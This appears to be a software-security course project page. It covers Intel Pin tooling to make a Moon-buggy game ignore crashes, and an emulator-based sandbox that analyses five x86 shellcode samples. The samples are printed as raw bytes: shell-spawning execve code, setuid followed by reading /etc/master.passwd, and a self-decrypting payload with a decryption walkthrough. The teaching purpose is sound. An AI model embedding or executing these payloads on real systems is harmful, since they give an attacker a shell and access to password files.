Project - HackMD

Please use ELMS-Canvas to submit your projects.
- Deadlines are posted on ELMS-Canvas.
- Feedback will be available after grading.

Preparation: Installing Intel Pin

Follow these steps only if your Linux system does not have Intel Pin installed. (If you downloaded the VirtualBox VM, Pin is already installed, so you can skip this part.)
Download https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh and run it.
```
$ cd
$ wget https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh
$ chmod +x pin.sh
$ ./pin.sh
```
1. The script downloads, unzips, and installs Pin.
2. After the installation, close the terminal and open a new one.
3. If you can run the pin binary in your home folder, the installation was successful.

Documents for Pin

Intel Pin for Perturbing Program Executions: Examples
Please see this page to turn off ASLR (Address Space Layout Randomization).
Intel Official Documents: Pin User Manual, Pin API Reference

Project 1: Zombie Moon-buggy

Background

You are given the Moon-buggy game. Your goal is to use Intel Pin to make the moon buggy keep going even after crashes.

Full Description

First, watch the video. It shows two moon buggy executions.

The first execution is the original game without any execution perturbation. The buggy crashes if you do not jump in time to avoid the holes in the ground.
The second execution is the original game with a Pin tool perturbing the execution to disable the crash detection logic. Even after a crash, the buggy keeps going.
- Even though the buggy looks damaged, it still functions (e.g., it keeps moving and can still fire).

You need to figure out how to make your own Pin tool that achieves the same goal: make the moon buggy keep going after crashes. You are supposed to figure this out by yourself by analyzing the source code.

Hint: Look at the "crash detection" mechanism. In other words, focus on how the program detects that the buggy ran into a hole and then crashes the buggy.

Resources

Download Moon-buggy Program

How to compile and run the moon-buggy program

Download and extract it.

Install required packages: autoconf, automake, texinfo, libncurses5-dev, libncursesw5-dev

$ sudo apt-get install autoconf automake texinfo 
$ sudo apt-get install libncurses5-dev libncursesw5-dev

Run the following commands

$ ./autogen.sh
$ ./configure
$ make

Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh

The script below creates a directory and downloads and unzips all the required files.

$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh
$ chmod +x prj1.sh
$ ./prj1.sh

Extra Challenge

The buggy has a laser that can be fired with the a key. Each shot deducts points from your game score. Can you make it increase the score instead? (e.g., every time you use the laser, you gain 10000 points)

Hint: Find out how the score is modified when the laser is fired.

What to submit

Your Pin tool code (please submit a single C/C++ file).
A report that includes:
(1) A high-level description of how your Pin tool works.
(2) The instructions and memory locations (i.e., variables) you changed to make the buggy invincible. You are expected to identify these through manual analysis.
(3) The implementation strategies of your Pin tool.

Project 2: Emulating Partial Program (Shellcode)

Background

Remote exploitation of a vulnerable program is a common tactic in cyber attacks. Typically, an attacker sends maliciously crafted inputs to a vulnerable program. Such input often consists of two parts: a malicious payload, which is executed after a successful exploitation, and an input that exploits the vulnerability to hijack the control flow and redirect it to the injected payload.

[Figure: example attack scenario (image not available)]

The above figure shows an example scenario.

First, an attacker sends a malicious payload to a vulnerable program, typically through a legitimate channel.
- Any code that allocates memory and fills it with data from the attacker can be used.
- Attackers typically repeat this process many times to spread many instances of the malicious payload across memory.
Second, a vulnerability-triggering input is sent to the program to trigger the vulnerability and hijack the control flow to execute the injected payload.
- The program then runs the injected malicious payload (shown in the green boxes), which creates a /bin/sh process.

Since the malicious payload is essentially the code bytes of a sequence of instructions, it can do anything. In practice, a malicious payload typically takes one of two forms: shellcode or ROP (return-oriented programming).
In this project, we focus only on shellcode. The following website gives a few examples of popular shellcode: http://shell-storm.org/shellcode/.

What is this project about?

Assume that you have obtained potentially malicious payloads (e.g., from network logs) and would like to know what they do. Executing them on a real machine or VM is a viable option, but a successful exploitation can harm the entire machine or VM. Sandboxing is a technique that runs a program while preventing it from doing any harm to the host system. In practice, sandboxing is commonly used to execute potentially malicious code because it lets you observe malicious actions without harming the host system.

This project asks you to create a sandboxing tool that executes such payloads safely using code emulation techniques. Specifically, given a sequence of code bytes (i.e., instructions), you run them and report what actions they perform (e.g., making a system call, performing a particular computation, etc.).

Five given shellcodes

You are given the shellcode examples below. Your goal is to make your program interpret their executions properly (e.g., which system calls were made with which arguments):

Example 1: CODE_EXAMPLE1

\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0
\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1

Example 2: CODE_EXAMPLE2

\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Example 3: CODE_EXAMPLE3

\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62
\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x0b\x50\xcd\x80\x50\x50\xcd
\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61
\x73\x73\x77\x64

Example 4: CODE_EXAMPLE4

\xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57
\x53\x50\xb0\x0b\xcd\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64
\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f

Example 5: CODE_EXAMPLE5

\x31\xd2\xeb\x0e\x31\xdb\x5b\xb1\x19\x83\x2c\x1a\x01\x42\xe2\xf9\xeb\x05\xe8\xed
\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x32\xdc\x8a\xe4
\x51\x55\x54\x51\xb1\x0c\xce\x81

Given program

You are given a program, emul.py, which leverages the Unicorn framework to run a given shellcode and report the executed instructions and their results.

Already supported system calls

The program can already execute a simple shellcode that does not cause any errors and uses only the following system calls.

Syscall Number	Syscall Name
1	sys_exit
4	sys_write
11	sys_execve
48	sys_signal
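
As a rough illustration of how such a table might be consulted, the sketch below maps the value found in EAX at `int 0x80` to a name. `SYSCALL_NAMES` and `syscall_name` are hypothetical names chosen for this example and are not taken from emul.py; the entries use the 32-bit Linux names for the numbers listed above.

```python
# Hypothetical lookup table for the system calls listed above
# (32-bit Linux numbers, as passed in EAX at `int 0x80`).
SYSCALL_NAMES = {
    1: "sys_exit",
    4: "sys_write",
    11: "sys_execve",
    48: "sys_signal",
}


def syscall_name(eax):
    """Return the name for a syscall number, or a marker for unsupported ones."""
    return SYSCALL_NAMES.get(eax, "unsupported (0x%x)" % eax)


print(syscall_name(0x0b))  # the number loaded by `mov al,0xb` before `int 0x80`
print(syscall_name(0x17))  # a number that is not in the table
```

With a structure like this, supporting another system call would amount to adding an entry and decoding its arguments from the registers.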

Already supported code examples

The program is already capable of running the first two shellcode samples: CODE_EXAMPLE1 and CODE_EXAMPLE2.

The below screenshot is an example of executing CODE_EXAMPLE1 with the provided program:

The program is configured as follows:

The shellcode is loaded at address 0x1000000.
The stack is placed at address 0x1200000.
Shellcode example 1 is 39 bytes long, and many of those bytes are not executed in the first run.
- The figure below visualizes the executed code (in red text/boxes). Bytes underlined together belong to a single instruction. Arrows indicate control-flow changes.
- Observe that many instructions remain uncovered (they are handled by the continue command below).
The program already supports the continue command, which executes the remaining instructions that have not been covered.
- Running with continue two more times gives the following output, meaning that there are no remaining instructions to execute.
  - To understand how continue is implemented, search for the inst_remain variable in project3.py and check the related code.
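
The numbers in this configuration can be checked with a few lines of Python. This is only a sanity-check sketch: `CODE_BASE` and `STACK_BASE` are names made up here for the two addresses given above, and the byte string is CODE_EXAMPLE1 as listed earlier.

```python
# CODE_EXAMPLE1 exactly as listed in this document.
CODE_EXAMPLE1 = (
    b"\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0"
    b"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1"
)

CODE_BASE = 0x1000000   # hypothetical name: address where the shellcode is placed
STACK_BASE = 0x1200000  # hypothetical name: address where the stack is placed

# Address of the last shellcode byte.
code_end = CODE_BASE + len(CODE_EXAMPLE1) - 1

print("length: %d bytes" % len(CODE_EXAMPLE1))
print("code range: 0x%x - 0x%x" % (CODE_BASE, code_end))
```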

Not supported examples

While Code Examples 1 and 2 are already supported, Examples 3, 4, and 5 are not handled correctly.
Your goal is to add code to support them. Below is a list of the challenges and potential solutions.

Example 3 and 4

System call 0x17 is not supported.
- 0x17 is SYS_SETUID. It takes a single argument, which is passed via the EBX register.
[Optional] System call 0x0 is not supported.
- It is up to you whether to support it. Simply adding an elif for system call 0 that prints a message (not an error message) is sufficient.
The instructions below are in fact a string that was already used in a previous system call. When the program detects that a string is being executed as instructions, print a message saying that it is executing a string, so there is no need to analyze the outcome.
Expected output (your goal is to change the program to behave as in the screenshot below, printing Are we executing a string? when an address that is known to hold a string is executed):
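
One possible way to recognize "an address that is known to be a string" is to remember the address range of every string seen as a system call argument and to test each executed address against those ranges. The sketch below shows only that bookkeeping, without Unicorn. `known_strings`, `remember_string`, and `is_known_string` are hypothetical names, and the string is located with `find()` purely for demonstration; in the real tool the address would come from a system call argument.

```python
CODE_BASE = 0x1000000  # load address stated in this document

# CODE_EXAMPLE3 exactly as listed in this document.
CODE_EXAMPLE3 = (
    b"\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62"
    b"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x0b\x50\xcd\x80\x50\x50\xcd"
    b"\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61"
    b"\x73\x73\x77\x64"
)

known_strings = []  # hypothetical list of (start, end) address ranges, end exclusive


def remember_string(start, length):
    """Record that `length` bytes at `start` were used as a string argument."""
    known_strings.append((start, start + length))


def is_known_string(address):
    """True if `address` falls inside a range recorded by remember_string()."""
    return any(start <= address < end for start, end in known_strings)


# Demonstration only: find the embedded path by searching the bytes.
path = b"/etc/master.passwd"
offset = CODE_EXAMPLE3.find(path)
remember_string(CODE_BASE + offset, len(path))

# 0x29 is the offset of the `call` (e8 ...) that precedes the string.
for address in (CODE_BASE + 0x29, CODE_BASE + offset):
    if is_known_string(address):
        print("Are we executing a string?")
    else:
        print("executing code at addr %x" % address)
```

A check like `is_known_string(address)` would naturally sit at the top of the instruction hook, before the instruction is analyzed.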

Example 5

Example 5's shellcode is encrypted. Below is its disassembly.

0:  31 d2                   xor    edx,edx
2:  eb 0e                   jmp    0x12
4:  31 db                   xor    ebx,ebx
6:  5b                      pop    ebx
7:  b1 19                   mov    cl,0x19
9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1
d:  42                      inc    edx
e:  e2 f9                   loop   0x9
10: eb 05                   jmp    0x17
12: e8 ed ff ff ff          call   0x4
17: 32 c1                   xor    al,cl
19: 51                      push   ecx
1a: 69 30 30 74 69 69       imul   esi,DWORD PTR [eax],0x69697430
20: 30 63 6a                xor    BYTE PTR [ebx+0x6a],ah
23: 6f                      outs   dx,DWORD PTR ds:[esi]
24: 32 dc                   xor    bl,ah
26: 8a e4                   mov    ah,ah
28: 51                      push   ecx
29: 55                      push   ebp
2a: 54                      push   esp
2b: 51                      push   ecx
2c: b1 0c                   mov    cl,0xc
2e: ce                      into
2f: 81                      .byte 0x81

Observe the execution flow: 0 -> 2 -> 12 -> 4 -> 6 -> 7 -> 9 -> d -> …
In particular, see the loop from 9 to e.

9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1
d:  42                      inc    edx
e:  e2 f9                   loop   0x9

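The loop performs a very simple decryption (value = value - 1), and the target buffer of this decryption is the code starting at 17. Because mov cl,0x19 sets the loop counter, the loop runs 0x19 (25) times when the rest of ECX is zero, which covers the 25 bytes from 17 to 2f.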

0:  31 d2                   xor    edx,edx
2:  eb 0e                   jmp    0x12 ----------------------------|
4:  31 db                   xor    ebx,ebx <------------------------|--|
6:  5b                      pop    ebx                              |  |
7:  b1 19                   mov    cl,0x19                          |  |
9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1        |  |
d:  42                      inc    edx                              |  |
e:  e2 f9                   loop   0x9                              |  |
10: eb 05                   jmp    0x17                             |  |
12: e8 ed ff ff ff          call   0x4  <---------------------------|--|
--------------------------------------------
17: 32 c1                   xor    al,cl
...
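
The branch targets in this flow can be recomputed from the raw bytes: a relative branch lands at the address of the next instruction plus a signed displacement. The sketch below does this for the four branches in the decoder stub. `rel8_target` and `rel32_target` are hypothetical helper names, and the byte string is CODE_EXAMPLE5 as listed earlier.

```python
import struct

# CODE_EXAMPLE5 exactly as listed in this document.
CODE_EXAMPLE5 = (
    b"\x31\xd2\xeb\x0e\x31\xdb\x5b\xb1\x19\x83\x2c\x1a\x01\x42\xe2\xf9\xeb\x05\xe8\xed"
    b"\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x32\xdc\x8a\xe4"
    b"\x51\x55\x54\x51\xb1\x0c\xce\x81"
)


def rel8_target(code, offset):
    """Target of a 2-byte short branch (jmp rel8 = 0xEB, loop rel8 = 0xE2)."""
    (disp,) = struct.unpack_from("<b", code, offset + 1)  # signed 8-bit displacement
    return offset + 2 + disp


def rel32_target(code, offset):
    """Target of a 5-byte `call rel32` (opcode 0xE8)."""
    (disp,) = struct.unpack_from("<i", code, offset + 1)  # signed 32-bit displacement
    return offset + 5 + disp


print("jmp  at 0x02 -> 0x%x" % rel8_target(CODE_EXAMPLE5, 0x02))
print("loop at 0x0e -> 0x%x" % rel8_target(CODE_EXAMPLE5, 0x0E))
print("jmp  at 0x10 -> 0x%x" % rel8_target(CODE_EXAMPLE5, 0x10))
print("call at 0x12 -> 0x%x" % rel32_target(CODE_EXAMPLE5, 0x12))
```

The call at 12 also pushes its return address, 17, which the pop ebx at 6 then picks up as the start of the buffer to decrypt.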

If we manually apply the decryption, we get the following code:

0:  31 d2                   xor    edx,edx
2:  eb 0e                   jmp    0x12
4:  31 db                   xor    ebx,ebx
6:  5b                      pop    ebx
7:  b1 19                   mov    cl,0x19
9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1
d:  42                      inc    edx
e:  e2 f9                   loop   0x9
10: eb 05                   jmp    0x17
12: e8 ed ff ff ff          call   0x4
--------------------------------------------
17: 31 c0                   xor    eax,eax
19: 50                      push   eax
1a: 68 2f 2f 73 68          push   0x68732f2f
1f: 68 2f 62 69 6e          push   0x6e69622f
24: 31 db                   xor    ebx,ebx
26: 89 e3                   mov    ebx,esp
28: 50                      push   eax
29: 54                      push   esp
2a: 53                      push   ebx
2b: 50                      push   eax
2c: b0 0b                   mov    al,0xb
2e: cd 80                   int    0x80
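
The manual decryption can be reproduced in a few lines of Python. The sketch below replays the loop on the 25 encrypted bytes that start at offset 17, using the same 32-bit subtraction as the sub instruction. The variable names are made up for this example, and the three padding bytes are an assumption added so that the last 32-bit accesses stay inside the buffer.

```python
# The 25 encrypted bytes of CODE_EXAMPLE5 starting at offset 0x17.
encrypted = bytes.fromhex(
    "32c1516930307469"
    "6930636a6f32dc8a"
    "e451555451b10cce81"
)

# Padding (an assumption of this sketch) keeps the final DWORD accesses in bounds.
buf = bytearray(encrypted) + bytearray(3)

# Mirrors: sub DWORD PTR [edx+ebx*1],0x1 ; inc edx ; loop 0x9   (cl = 0x19)
for edx in range(0x19):
    dword = int.from_bytes(buf[edx:edx + 4], "little")
    dword = (dword - 1) & 0xFFFFFFFF
    buf[edx:edx + 4] = dword.to_bytes(4, "little")

decrypted = bytes(buf[:len(encrypted)])
print(" ".join("%02x" % b for b in decrypted))
```

Since none of the encrypted bytes is 0x00, the 32-bit subtraction never borrows into the neighboring bytes, so each iteration effectively decrements a single byte.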

Now, your goal is to improve the program to handle this code.
If you run project3.py as modified so far, you will get the output shown in the following screenshot.

Currently, the program stops the analysis if it encounters the same instruction twice within the same execution.

See the code below in hook_code().

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    ...
    elif address in inst_executed_local:
        if address in cnt_repeated:
            cnt_repeated[address] = cnt_repeated[address] + 1
        else:
            cnt_repeated[address] = 1
        output = "Already covered (stop analysis):: addr %x (repeated: %d)" % (address, cnt_repeated[address])
        out(output)
        uc.emu_stop()
        return

This code terminates the analysis by calling uc.emu_stop() as soon as any instruction is executed more than once (see the elif address in inst_executed_local condition).

As we saw, the decryption requires a loop, so you have to allow instructions to be executed repeatedly. In this homework, you are asked to allow each instruction to run up to 100 times.
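
One way to express such a limit is a per-address counter that only reports "stop" once the limit is exceeded. The sketch below shows the counting logic by itself, outside of Unicorn. `MAX_REPEAT` and `should_stop` are hypothetical names, and counting every execution (rather than only repeats, as cnt_repeated does in hook_code()) is an assumption of this sketch.

```python
MAX_REPEAT = 100   # per-instruction limit stated in this document
cnt_repeated = {}  # address -> number of times the instruction has been executed


def should_stop(address):
    """Count one more execution of `address`; True once it exceeds MAX_REPEAT."""
    cnt_repeated[address] = cnt_repeated.get(address, 0) + 1
    return cnt_repeated[address] > MAX_REPEAT


# Simulate the decryption loop body at offset 0x9, which runs 0x19 (25) times.
loop_addr = 0x1000000 + 0x9
stopped_early = any(should_stop(loop_addr) for _ in range(0x19))
print("stopped during decryption loop:", stopped_early)
```

In the instruction hook, a True result would be the point at which the tool prints its message and calls uc.emu_stop().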

After this change, we get the following result:

Now we can execute the first system call, but continue does not work for the decrypted code.

Observe that the code is the original code, which has not been decrypted.
This is because when we run the program again, we lose the previous memory state that holds the decrypted code.

The last piece of this project is to save the memory state at the end of the execution and load it in the next run.
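
A minimal sketch of this save-and-restore idea follows. It relies only on `mem_read(address, size)` and `mem_write(address, data)`, which are the memory accessors of the Unicorn Python binding. Everything else is an assumption made for illustration: the function names, the use of pickle, the file name, and the `FakeEmulator` stand-in that lets the example run without Unicorn installed.

```python
import os
import pickle
import tempfile


def save_memory(uc, path, regions):
    """Dump each (address, size) region of `uc` to the file at `path`."""
    snapshot = {addr: bytes(uc.mem_read(addr, size)) for addr, size in regions}
    with open(path, "wb") as f:
        pickle.dump(snapshot, f)


def load_memory(uc, path):
    """Write a snapshot made by save_memory() back into `uc`; False if absent."""
    if not os.path.exists(path):
        return False
    with open(path, "rb") as f:
        snapshot = pickle.load(f)
    for addr, data in snapshot.items():
        uc.mem_write(addr, data)
    return True


class FakeEmulator:
    """Stand-in exposing only mem_read/mem_write, so the sketch runs without Unicorn."""

    def __init__(self, base, data):
        self.base = base
        self.mem = bytearray(data)

    def mem_read(self, address, size):
        start = address - self.base
        return bytearray(self.mem[start:start + size])

    def mem_write(self, address, data):
        start = address - self.base
        self.mem[start:start + len(data)] = data


CODE_BASE = 0x1000000
state_file = os.path.join(tempfile.mkdtemp(), "memory_state.bin")

first_run = FakeEmulator(CODE_BASE, b"\x32\xc1\x51\x69")   # still-encrypted bytes
first_run.mem_write(CODE_BASE, b"\x31\xc0\x50\x68")        # pretend the loop decrypted them
save_memory(first_run, state_file, [(CODE_BASE, 4)])

second_run = FakeEmulator(CODE_BASE, b"\x32\xc1\x51\x69")  # a fresh run starts encrypted again
load_memory(second_run, state_file)
print(second_run.mem.hex())
```

In the real tool, the load step would run after the shellcode has been written into the emulator's memory and before emulation starts, so that the decrypted bytes replace the freshly loaded encrypted ones.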

The final outcome should allow you to run the program twice more, covering SYS_EXECVE twice with different arguments.

What to do

Download the Unicorn framework.
Download emul.py and emul_util.py and put them in the bindings folder.
- emul.py
- emul_util.py
Follow the description above and the lecture video to improve the program so that it can handle all five example shellcodes.

Resources

Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh

The script below creates a directory and downloads and unzips all the required files.

$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh
$ chmod +x prj2.sh
$ ./prj2.sh

What to submit

Final source code
Screenshots of each example shellcode running correctly on your terminal.